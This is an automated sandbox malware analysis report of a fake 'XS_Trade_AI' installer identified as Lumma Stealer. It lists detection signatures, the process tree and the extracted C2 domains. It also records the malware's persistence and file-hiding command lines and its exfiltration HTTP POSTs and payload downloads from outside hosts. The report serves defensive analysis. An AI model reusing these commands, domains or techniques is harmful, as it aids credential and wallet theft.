Windows Analysis Report
XS_Trade_AI-newest_release_.exe

Overview

General Information

Sample name:XS_Trade_AI-newest_release_.exe
Analysis ID:1543888
MD5:869366922ec1233b2fd7adacb0ce27c3
SHA1:8980ef4149a7b3f357f9d114735e9797cd607e84
SHA256:a0041464eaecdb08119b38f377c919e512610307cd7f994aba11c02112fb6777
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops password protected ZIP file
Found pyInstaller with non standard icon
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to a URL shortener service
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XS_Trade_AI-newest_release_.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" MD5: 869366922EC1233B2FD7ADACB0CE27C3)
    • XS_Trade_AI-newest_release_.tmp (PID: 7324 cmdline: "C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$402A0,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" MD5: 797B09E2DCF988B4320DDCDD4CB936F0)
      • XS_Trade_AI-newest_release_.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp- MD5: 869366922EC1233B2FD7ADACB0CE27C3)
        • XS_Trade_AI-newest_release_.tmp (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp- MD5: 797B09E2DCF988B4320DDCDD4CB936F0)
          • idp.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" -o"C:\Users\user\AppData\Local\Programs\Common" -y -p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419 MD5: 6482EE0F372469D1190C74BD70D76153)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7656 cmdline: "cmd.exe" /C attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 7708 cmdline: attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
          • schtasks.exe (PID: 7724 cmdline: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • taskshosts.exe (PID: 7824 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
    • taskshosts.exe (PID: 7848 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
      • ngentask.exe (PID: 7928 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • taskshosts.exe (PID: 8016 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
    • taskshosts.exe (PID: 8036 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
      • ngentask.exe (PID: 8052 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["faulteyotk.site", "dilemmadu.site", "revordirecut.cyou", "goalyfeastz.site", "servicedny.site", "authorisev.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "ROmgOO--"}
Source: sslproxydump.pcap; Rule: JoeSecurity_LummaCStealer_3; Description: Yara detected LummaC Stealer; Author: Joe Security
Source: decrypted.memstr; Rule: JoeSecurity_LummaCStealer_2; Description: Yara detected LummaC Stealer; Author: Joe Security

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp, ParentProcessId: 7424, ParentProcessName: XS_Trade_AI-newest_release_.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, ProcessId: 7724, ProcessName: schtasks.exe

      Persistence and Installation Behavior

      Source: Process started; Author: Joe Security; Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp, ParentProcessId: 7424, ParentProcessName: XS_Trade_AI-newest_release_.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, ProcessId: 7724, ProcessName: schtasks.exe

      Suricata IDS alerts

      Timestamp                       | SID     | Severity | Classtype                                    | Source IP   | Source Port | Destination IP | Destination Port | Protocol
      2024-10-28T15:50:07.155702+0100 | 2054653 | 1        | A Network Trojan was detected                | 192.168.2.4 | 49743       | 104.21.83.166  | 443              | TCP
      2024-10-28T15:50:08.587832+0100 | 2054653 | 1        | A Network Trojan was detected                | 192.168.2.4 | 49744       | 104.21.83.166  | 443              | TCP
      2024-10-28T15:50:19.440889+0100 | 2054653 | 1        | A Network Trojan was detected                | 192.168.2.4 | 49750       | 104.21.83.166  | 443              | TCP
      2024-10-28T15:50:07.155702+0100 | 2049836 | 1        | A Network Trojan was detected                | 192.168.2.4 | 49743       | 104.21.83.166  | 443              | TCP
      2024-10-28T15:50:08.587832+0100 | 2049812 | 1        | A Network Trojan was detected                | 192.168.2.4 | 49744       | 104.21.83.166  | 443              | TCP
      2024-10-28T15:50:15.323831+0100 | 2048094 | 1        | Malware Command and Control Activity Detected | 192.168.2.4 | 49748       | 104.21.83.166  | 443              | TCP


      AV Detection

      Source: 21.2.ngentask.exe.400000.0.raw.unpack; Malware Configuration Extractor: LummaC {"C2 url": ["faulteyotk.site", "dilemmadu.site", "revordirecut.cyou", "goalyfeastz.site", "servicedny.site", "authorisev.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "ROmgOO--"}
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: servicedny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: authorisev.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: faulteyotk.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: dilemmadu.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: contemteny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: goalyfeastz.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: opposezmny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: seallysl.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: revordirecut.cyou
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: TeslaBrowser/5.5
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: - Screen Resoluton:
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: - Physical Installed Memory:
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: Workgroup: -
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmp; String decryptor: ROmgOO--
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe; Code function: 21_2_0041D5AF CryptUnprotectData, 21_2_0041D5AF
      Source: XS_Trade_AI-newest_release_.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknown; HTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 135.181.116.240:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: XS_Trade_AI-newest_release_.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016209279.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018746592.000000000124F000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.19.dr
      Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2017090409.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015374967.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000124F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015258110.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015874093.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016688883.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2025854099.0000000001258000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.19.dr, _socket.pyd.15.dr
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe; Code function: 6_2_00276CE2 __EH_prolog, FindFirstFileW, FindFirstFileW, FindFirstFileW, 6_2_00276CE2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe; Code function: 15_2_006903E2 FindFirstFileExW, GetLastError, FindNextFileW, GetLastError, 15_2_006903E2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe; Code function: 16_2_006903E2 FindFirstFileExW, GetLastError, FindNextFileW, GetLastError, 16_2_006903E2
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe; Code function: 6_2_00277904 __EH_prolog, GetLogicalDriveStringsW, GetLogicalDriveStringsW, GetLogicalDriveStringsW, 6_2_00277904

      Networking

      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49744 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 104.21.83.166:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.83.166:443
      Source: Malware configuration extractorURLs: faulteyotk.site
      Source: Malware configuration extractorURLs: dilemmadu.site
      Source: Malware configuration extractorURLs: revordirecut.cyou
      Source: Malware configuration extractorURLs: goalyfeastz.site
      Source: Malware configuration extractorURLs: servicedny.site
      Source: Malware configuration extractorURLs: authorisev.site
      Source: Malware configuration extractorURLs: contemteny.site
      Source: Malware configuration extractorURLs: opposezmny.site
      Source: Malware configuration extractorURLs: seallysl.site
      Source: unknownDNS query: name: tinyurl.com
      Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
      Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /ec75f7fn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: tinyurl.com
      Source: global trafficHTTP traffic detected: GET /55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/raw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: rentry.org
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1259Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549906Host: revordirecut.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: revordirecut.cyou
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /yyttrsu.zip HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: dl.jrdesklabs.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: tinyurl.com
      Source: global trafficDNS traffic detected: DNS query: rentry.org
      Source: global trafficDNS traffic detected: DNS query: dl.jrdesklabs.com
      Source: global trafficDNS traffic detected: DNS query: revordirecut.cyou
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revordirecut.cyou
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828489513.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/innosetup/index.htm
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
